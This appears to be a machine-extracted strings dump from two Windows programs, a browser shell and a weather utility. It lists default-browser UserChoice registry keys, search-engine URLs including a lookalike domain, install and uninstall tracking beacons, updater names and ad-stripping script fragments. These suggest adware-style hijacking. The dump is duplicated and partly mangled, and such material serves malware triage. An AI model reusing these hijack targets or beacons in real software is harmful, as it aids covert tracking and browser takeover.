CHttpEncoderA::_AnsiCharToUtf8Char: szUtf8Char and szAnsiChar can not be NULL.
CHttpEncoderA::UrlEncodeW: szBuff can not be NULL.
CHttpEncoderA::UrlEncodeW: szBuff can not be NULL.
.PAVCFileException@@
.PAVCFileException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCMemoryException@@
.PAVCMemoryException@@
GDI32.DLL
GDI32.DLL
RICHED32.DLL
RICHED32.DLL
RICHED20.DLL
RICHED20.DLL
shlwapi.dll
shlwapi.dll
1.2.10
1.2.10
UXTHEME.DLL
UXTHEME.DLL
.PAVCException@@
.PAVCException@@
PSAPI.DLL
PSAPI.DLL
NULL row buffer for row %ld, pass %d
NULL row buffer for row %ld, pass %d
RICHED20.dll
RICHED20.dll
libpng error: %s
libpng error: %s
libpng error: %s, offset=%d
libpng error: %s, offset=%d
Unknown zTXt compression type %d
Unknown zTXt compression type %d
Incomplete compressed datastream in %s chunk
Incomplete compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Data error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
Buffer error in compressed datastream in %s chunk
gamma = (%d/100000)
gamma = (%d/100000)
gx=%f, gy=%f, bx=%f, by=%f
gx=%f, gy=%f, bx=%f, by=%f
wx=%f, wy=%f, rx=%f, ry=%f
wx=%f, wy=%f, rx=%f, ry=%f
incorrect gamma=(%d/100000)
incorrect gamma=(%d/100000)
iTXt chunk not supported.
iTXt chunk not supported.
IE9.IE9NSHandle.1 = s 'IE9NSHandle Class'
IE9.IE9NSHandle.1 = s 'IE9NSHandle Class'
CLSID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
CLSID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
IE9.IE9NSHandle = s 'IE9NSHandle Class'
IE9.IE9NSHandle = s 'IE9NSHandle Class'
ForceRemove {00B39D47-3331-49a7-B54E-32AE6E993C67} = s 'IE9NSHandle Class'
ForceRemove {00B39D47-3331-49a7-B54E-32AE6E993C67} = s 'IE9NSHandle Class'
ProgID = s 'IE9.IE9NSHandle.1'
ProgID = s 'IE9.IE9NSHandle.1'
VersionIndependentProgID = s 'IE9.IE9NSHandle'
VersionIndependentProgID = s 'IE9.IE9NSHandle'
val AppID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
val AppID = s '{00B39D47-3331-49a7-B54E-32AE6E993C67}'
'TypeLib' = s '{14264AA3-BB53-4d3a-89DE-05AD67D6D6C6}'
'TypeLib' = s '{14264AA3-BB53-4d3a-89DE-05AD67D6D6C6}'
version="1.0.0.0"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
publicKeyToken="6595b64144ccf1df"
Config.dll
Config.dll
<gesture action="U" cmd="9" title="</pre><pre>" /><gesture action="D" cmd="10" title="</pre><pre>" /><gesture action="R" cmd="1" title="</pre><pre>" /><gesture action="L" cmd="0" title="</pre><pre>" /><gesture action="DR" cmd="20" title="</pre><pre>" /><gesture action="UD" cmd="2" title="</pre><pre>E<gesture action=" U><pre>%s-Bar%d</pre><pre>%s-DockBar%d</pre><pre>%s-Summary</pre><pre>MRUDockLeftPos</pre><pre>Bar#%d</pre><pre>%s-Controls</pre><pre>F%s-Options</pre><pre>Pane-%d</pre><pre>\collect_s.dat</pre><pre>\collect_o.dat</pre><pre>\collect_t.dat</pre><pre>collect_o.dat</pre><pre>[d/d-d:d:d]</pre><pre>User32.DLL</pre><pre>ftp://</pre><pre>https://</pre><pre>config.ini</pre><pre>search1.taobao.com</pre><pre>search8.taobao.com</pre><pre>taobao.com/browse/search_auction.htm?</pre><pre>baidu.com/baidu?</pre><pre>daidu.com/s?</pre><pre>.edu.</pre><pre>.org.</pre><pre>.net.</pre><pre>.com.</pre><pre>.edu/</pre><pre>.org/</pre><pre>.net/</pre><pre>.com/</pre><pre>https://www.</pre><pre>http://www.</pre><pre>IEXPLORE.EXE</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mhtml\UserChoice</pre><pre>IE.AssocFile.MHT</pre><pre>IE.AssocFile.HTM</pre><pre>IE.HTTPS</pre><pre>IE.HTTP</pre><pre>IE.FTP</pre><pre>\Internet Explorer\IEXPLORE.EXE</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mht\UserChoice</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice</pre><pre>iie.HTTP</pre><pre>iie.HTTP\shell</pre><pre>ftp\shell</pre><pre>https\shell</pre><pre>http\shell</pre><pre>CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32</pre><pre>.shtml</pre><pre>.shtm</pre><pre>.mhtml</pre><pre>.html</pre><pre>%s\%s</pre><pre>%s\%s\command</pre><pre>"%s" %%1</pre><pre>Internet Explorer\iexplore.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion</pre><pre>durlmon.dll</pre><pre><li><a href="%s" target="_blank">%s</a></li></pre><pre>http://www.biso.cc/ld/stat.asp?install</pre><pre>%s\Common Files\stat.dat</pre><pre>http://www.biso.cc/ld/stat.php?uninstal</pre><pre>http://www.biso.cc/ld/stat.asp?open</pre><pre>Software\Microsoft\WindowsLive</pre><pre>CommandBars.ini</pre><pre>start/index.html</pre><pre>file:///%sprofile/Template/</pre><pre>\Unblocksite.dat</pre><pre>webprx</pre><pre>saveKeyword</pre><pre>oleaut32.dll</pre><pre>%d-%s</pre><pre>https</pre><pre>http:</pre><pre>navcancl.htm#</pre><pre><script language="JavaScript"> document.body.style.zoom="%d%%"; </script></pre><pre>var i = parseInt(document.body.style.zoom);</pre><pre>if(isNaN(i))i=100; if(i<0)i=0; if(i==19)i=18; newZoom=i 10 '%'; document.body.style.zoom=newZoom; <script></pre><pre>if(isNaN(i))i=100; if(i<18)i=18; newZoom=i-10 '%'; document.body.style.zoom=newZoom; </script></pre><pre>\/:*?"<>|</pre><pre>MSWHEEL_ROLLMSG</pre><pre>RSRC32.dll</pre><pre>Software\Microsoft\Internet Explorer\TypedUrls</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings</pre><pre>unbock_%d</pre><pre>block_%d</pre><pre>blockage.ini</pre><pre>url_unblock_count</pre><pre>url_block_count</pre><pre>key_0</pre><pre>key_%d</pre><pre>searchkeys.ini</pre><pre>shdocvw.dll</pre><pre>windows-874</pre><pre>windows-1258</pre><pre>windows-1257</pre><pre>windows-1256</pre><pre>windows-1255</pre><pre>windows-1254</pre><pre>windows-1253</pre><pre>windows-1251</pre><pre>windows-1250</pre><pre>www.g-leaf.cn</pre><pre>%s - %s</pre><pre>url_%d</pre><pre>title_%d</pre><pre>last.ini</pre><pre>.com.cn</pre><pre>HOTKEYSET</pre><pre>.ZIP;.RAR;.EXE</pre><pre>bosskey</pre><pre>http://%u.%u.</pre><pre>http://www.baidu.com/s?wd=%s&tt=</pre><pre>d:d:d</pre><pre>.jpeg</pre><pre>Software\Microsoft\Internet Explorer\ActiveX Compatibility\{D27CDB6E-AE6D-11cf-96B8-444553540000}</pre><pre>%download_info</pre><pre>%download_url</pre><pre>function cancelError() {return true;} onerror=cancelError;function newpropertychange(){var name = event.propertyName.toLowerCase();var elem = event.srcElement;if( name.indexOf('left')>-1||name.indexOf('top')>-1||name.indexOf('move')>-1){ try{ elem.onpropertychange = null; elem.style.visibility = 'hidden'; elem.srcElement.removeNode(true); }catch(e){} }}function killobj(doc,obj){var objs=doc.document.getElementsByTagName(obj);for (var i=0;i<objs><pre>Resource\KillFlyAd.htm</pre><pre>function cancelError() {return true;} onerror=cancelError;var i,len,src,img;len=document.images.length;for(i=0;i<len><pre>function cancelError() {return true;} onerror=cancelError;function killTag(tagName){var url;var objs=document.getElementsByTagName(tagName);for(i=0;i<objs><pre>o%s\profile\SearchEngine\%s</pre><pre>mskin.ini</pre><pre>%s%s\%s</pre><pre>Language\*.dll</pre><pre>iiedata.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites\</pre><pre>Proxy%d_</pre><pre>proxy.ini</pre><pre>%d_ico</pre><pre>%d_title</pre><pre>profile\SearchEngine\config.ini</pre><pre>www.daidu.com</pre><pre>MenuClose.Hover</pre><pre>MenuMaximum.Hover</pre><pre>MenuRestore.Hover</pre><pre>MenuMinimize.Hover</pre><pre>SkinSelect.Hover</pre><pre>TabSidebar.Hover</pre><pre>Search.Hover</pre><pre>Go.Hover</pre><pre>Home.Offset</pre><pre>Home.Hover</pre><pre>Undo.Offset</pre><pre>Undo.Disable</pre><pre>Undo.Hover</pre><pre>Stop.Offset</pre><pre>Stop.Hover</pre><pre>Refresh.Offset</pre><pre>Refresh.Hover</pre><pre>HistoryMenu.Offset</pre><pre>HistoryMenu.Hover</pre><pre>HistoryMenu.Disable</pre><pre>Forward.Offset</pre><pre>Forward.Hover</pre><pre>Forward.Disable</pre><pre>Back.Offset</pre><pre>Back.Hover</pre><pre>Back.Disable</pre><pre>SideClose.Hover</pre><pre>Thumb.Hover.Image</pre><pre>Thumb.Normal.Image</pre><pre>Background.Hover.Image</pre><pre>Background.Normal.Image</pre><pre>Foreground.Image</pre><pre>Progress.Image</pre><pre>StatusBar.Image</pre><pre>InactiveBackground.Image</pre><pre>Background.Image</pre><pre>Split.Hover</pre><pre>Split.Disable</pre><pre>TabNew.Hover</pre><pre>AutoHidePaneBackground.Fill.ColorEnd</pre><pre>AutoHidePaneBackground.Fill.ColorStart</pre><pre>BlockBarBackground.Fill.ColorEnd</pre><pre>BlockBarBackground.Fill.ColorStart</pre><pre>TreeCtrl.Fill.ColorEnd</pre><pre>TreeCtrl.Fill.ColorStart</pre><pre>Tab.InsertSign</pre><pre>Tab.Active.Text</pre><pre>Tab.Hover.Text</pre><pre>Tab.Normal.Text</pre><pre>ToolBar.Style</pre><pre>Menu.Border</pre><pre>Menu.Disable.Text</pre><pre>Menu.Normal.Text</pre><pre>Toolbar.Gripper.ShadowColor</pre><pre>Toolbar.Gripper.Color</pre><pre>Toolbar.Gripper.Width</pre><pre>Toolbar.Gripper.Style</pre><pre>ComboBox.Disable.text</pre><pre>ComboBox.Text</pre><pre>Toolbar.Disable.Text</pre><pre>Toolbar.Normal.Text</pre><pre>Menu.Separator.ShadowColor</pre><pre>Menu.Separator.Color</pre><pre>Menu.Separator.Offset</pre><pre>Menu.Separator.Width</pre><pre>MenuItem.Hover.Image</pre><pre>FavToolBar.Fill.ColorEnd</pre><pre>FavToolBar.Fill.ColorStart</pre><pre>FloatBar.Fill.ColorEnd</pre><pre>FloatBar.Fill.ColorStart</pre><pre>Menu.Fill.ColorEnd</pre><pre>Menu.Fill.ColorStart</pre><pre>Menu.Image</pre><pre>Menu.Style</pre><pre>TitleBackground.Fill.ColorEnd</pre><pre>TitleBackground.Fill.ColorStart</pre><pre>TitleBackground.Image</pre><pre>TitleBackground.Style</pre><pre>Tab.Hover.Image</pre><pre>Tab.Active.Image</pre><pre>Tab.Normal.Image</pre><pre>TabBackground.Fill.ColorEnd</pre><pre>TabBackground.Fill.ColorStart</pre><pre>TabBackground.Image</pre><pre>TabBackground.Style</pre><pre>Button.Checked.Image</pre><pre>Button.Pressed.Image</pre><pre>Button.Hover.Image</pre><pre>Caption.Text</pre><pre>MainPanel.Fill.ColorEnd</pre><pre>MainPanel.Fill.ColorStart</pre><pre>MainPanel.Image</pre><pre>MainPanel.Style</pre><pre>Edit.Height</pre><pre>CustomFrame.CornerRadius</pre><pre>CustomFrame.CornerSize</pre><pre>CustomFrame.Image</pre><pre>%s.Stretch</pre><pre>%s.EndOffset</pre><pre>%s.StartOffset</pre><pre>%s.ExtendSpace</pre><pre>%s.Offset</pre><pre>%s.DrawBackground</pre><pre>%s.Hover</pre><pre>\updatelog.txt</pre><pre>update.exe</pre><pre>Element '%s' at offset %d not ended</pre><pre>End tag '%s' at offset %d does not match start tag '%s' at offset %d</pre><pre>No start tag for end tag '%s' at offset %d</pre><pre>%s at offset %d unterminated</pre><pre>Incorrect %s at offset %d</pre><pre>.The file (%s) aleady exists.</pre><pre>COMCTL32.DLL</pre><pre>User32.dll</pre><pre>user32.dll</pre><pre>oleacc.dll</pre><pre>%s-%s</pre><pre>KeyboardCuesShow</pre><pre>KeyboardCuesUse</pre><pre>AlwaysShowFullMenus</pre><pre>msimg32.dll</pre><pre>winxp.royale.cjstyles</pre><pre>royale.msstyles</pre><pre>winxp.luna.cjstyles</pre><pre>luna.msstyles</pre><pre>WindowRectLeftPos</pre><pre>Right Windows</pre><pre>Left Windows</pre><pre>dUxTheme.dll</pre><pre>Ldwmapi.dll</pre><pre>CONTEXTTAB%s</pre><pre>CONTEXTTAB%sCLIENT</pre><pre>CONTEXTTAB%sGROUPBUTTON</pre><pre>ContextTab%sHeader</pre><pre>%Y-%d-%mT%H:%M:%S</pre><pre>%Y-%d-%m</pre><pre>%H:%M:%S</pre><pre>wID=X, cx=%d, fStyle=X</pre><pre>%i %s</pre><pre>1&0 %s</pre><pre>&%i %s</pre><pre>shell32.dll</pre><pre>OFFICE2007\SCROLLTHUMBHORIZONTAL.BMP</pre><pre>OFFICE2007\SCROLLTHUMBVERTICAL.BMP</pre><pre>OFFICE2007\SCROLLARROWSVERTICALDARK.BMP</pre><pre>OFFICE2007\SCROLLARROWSVERTICALLIGHT.BMP</pre><pre>OFFICE2007\SCROLLARROWSHORIZONTALDARK.BMP</pre><pre>OFFICE2007\SCROLLARROWSHORIZONTALLIGHT.BMP</pre><pre>OFFICE2007\SCROLLVERTICALDARK.BMP</pre><pre>OFFICE2007\SCROLLHORIZONTALDARK.BMP</pre><pre>OFFICE2007\SCROLLVERTICALLIGHT.BMP</pre><pre>OFFICE2007\SCROLLHORIZONTALLIGHT.BMP</pre><pre>OFFICE2007\SCROLLARROWGLYPHS.BMP</pre><pre>WindowsForms</pre><pre>SHLWAPI.DLL</pre><pre>USER32.DLL</pre><pre>KERNEL32.DLL</pre><pre>FRAMECAPTION%s%i</pre><pre>0000..\\updata.exe</pre><pre>(Windows)</pre><pre>:http://127.0.0.1:80</pre><pre>&Windows sockets initialization failed.</pre><pre>!.Icon Files (*.ico)|*.ico|All Files (*.*)|*.*||</pre><pre>|*.htm;*.html|</pre><pre>|*.txt|GIF</pre><pre>|*.gif|JPEG</pre><pre>|*.jpg;*.jpeg|AU</pre><pre>|*.au|AIFF</pre><pre>|*.aif;*.aiff|XBM</pre><pre>|*.xbm|</pre><pre>|*.*||!</pre><pre>(*.txt)|*.txt|</pre><pre>(*.*)|*.*||</pre><pre>(*.exe)|*.exe|</pre><pre>(*.*)|*.*||</pre><pre>IE.Document</pre><pre>IE Files (*.htm,*.html)</pre><pre>Input URL:</pre><pre>0, 1, 1, 982</pre><pre>GreenDou1.exe</pre><b>worldweather.exe_2452:</b><pre>.text</pre><pre>`.data</pre><pre>.rsrc</pre><pre>MSVBVM60.DLL</pre><pre>%Z%FG2F1</pre><pre>VB5!6&vb6chs.dll</pre><pre>CMsgTrans</pre><pre>GdiplusShutdown</pre><pre>gdi32.dll</pre><pre>user32.dll</pre><pre>%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB</pre><pre>wininet.dll</pre><pre>DeleteUrlCacheEntry</pre><pre>mfc5002.dll</pre><pre>kernel32.dll</pre><pre>shell32.dll</pre><pre>user32.dll</pre><pre>orldweather5.0.0</pre><pre>sqliteApi.dll</pre><pre>Sqlite_QueryCityID</pre><pre>VBA6.DLL</pre><pre>[fjbntbpvdqyZgocnvcnvcludmvdnudnucoucoubntcoucoufrx^jpiu{htz_kqdpveqw`lrcou]iofrxhtzdpv`lr`lreqw\hnfrxkw}amscoueqwfrxcoueqwcoudpvbntcoucoucoubntbntcoucoubntbnteqw_kqbntiu{`lrWcihtz</pre><pre>msgID</pre><pre><assemblyIdentity version="1.1.0.2" processorArchitecture="x86" name="worldweather.exe" type="win32"></assemblyIdentity></pre><pre><description>worldweather.exe</description></pre><pre><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></pre><pre>D:\everyday\36</pre><pre>>cmd=[</pre><pre>Cfg5002.ini</pre><pre>worldWeatherRealTime5002.exe</pre><pre>http://tongji.uujzy.com/tongji.html</pre><pre>WeatherContext\WeatherContext.db</pre><pre>http://</pre><pre><port></port></pre><pre></pre><pre>?5.0.0.5002_id</pre><pre>?5.0.0.5002_md</pre><pre>AQI.5002.exe</pre><pre>PM25.5002.exe</pre><pre>PM10.5002.exe</pre><pre>tongjizxDataby51la>TongjiUrl=</pre><pre>>port=</pre><pre>Timer_Timer(0)>10>AlreadyHasExecSplitData</pre><pre>Timer_Timer(0)>10>tmr45stoExecSplitData</pre><pre>worldWeatherUpdate.5002.exe</pre><pre>Timer_Timer(5)>readyto>doactiveExecSplitData</pre><pre>skins\default\bg_small.png</pre><pre>skins\default\bg_large.png</pre><pre>skins\common\loading.png</pre><pre>http://weather.uujzy.com:8123/tt.php?id=****</pre><pre>http://sj.tianqi.com/index.php?c=other&a=apppc&id=****</pre><pre>http://i.tianqi.com/index.php?c=other&a=apppc&id=****</pre><pre>http://pm25.uujzy.com:8123/data/****.js</pre><pre>http://www.pm25.in/****</pre><pre>http://weather51la.cnzz.uujzy.com/cnzz/weather/5.0.0.5002/</pre><pre>GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrl,gWeatherUrlBf1=</pre><pre>GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf2=</pre><pre>GetCityIDFromWeatherDBbyIPAndMC>gWeatherUrlBf3=</pre><pre>weatherData.tmp</pre><pre>\n99.png</pre><pre>areacode.db</pre><pre>GetWeatherAQIData>sAQIUrl></pre><pre>skins\common\kz.png</pre><pre>Adodb.Stream</pre><pre>Microsoft.XMLHTTP</pre><pre>Pm2.5MK.exe</pre><pre>needshowpm25data>readyRunExecFile></pre><pre>needshowpm25data>notExistExecFile></pre><pre>AQIContext\AQIContext.db</pre><pre>tryToConnectWeatherService>gWeatherPngUrl=</pre><pre>ConnectWeatherServiceBkInfo>queryifnetactive_Error>tmrtorequerybynexturl>iLoadWeatherFail=</pre><pre>worldWeatherUpdate.5002.exe.tmp</pre><pre>>ReadyTimertoTryNextUrl</pre><pre>cnzz.html</pre><pre>ConnectWeatherServiceBkInfo>loadweatherData_Fail>tmrtorequerybynexturl>iLoadWeatherFail=</pre><pre>tryToConnectWeatherService>beginQueryIfReceiveNetStateMsgIn1min</pre><pre>skins\common\err.png</pre><pre>updatedata/worldWeatherUpdate.5002.exe</pre><pre>QueryIfHaveHighVersion>FindNoUpdateUrl>cancel</pre><pre>debug_main.log</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\</pre><pre>HookMsg></pre><pre>UnhookMsg></pre><pre>Microsoft Windows NT 4.0</pre><pre>weather.db</pre><pre>Sqlite_QueryCityID></pre><pre>skins\default\btn_close.jpg</pre><pre>skins\default\btn_max.jpg</pre><pre>skins\default\btn_min.jpg</pre><pre>skins\default\btn_setting.jpg</pre><pre>skins\default\btn_move.jpg</pre><pre>.wServicePackMajor:</pre><pre>.wServicePackMinor:</pre><pre>.wSuiteMask:</pre><pre>.wProductType:</pre><pre>Microsoft Windows 95</pre><pre>Microsoft Windows 98</pre><pre>Microsoft Windows Me</pre><pre>Windows 2000 Data center</pre><pre>Windows 2000 Advanced</pre><pre>Windows 2000</pre><pre>Windows XP Professional</pre><pre>Windows XP Home</pre><pre>Windows XP</pre><pre>Windows Server 2003 Enterprise</pre><pre>Windows Server 2003 Data center</pre><pre>Windows Server 2003 Web Edition</pre><pre>Windows Server 2003 Standard</pre><pre>Windows Server 2003</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Microsoft Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Microsoft Windows 8</pre><pre>GetwindowsVersion></pre><pre>world.cn</pre><pre>5.00.5002</pre><pre>worldweather.exe</pre></objs></pre></len></pre></objs></pre></gesture>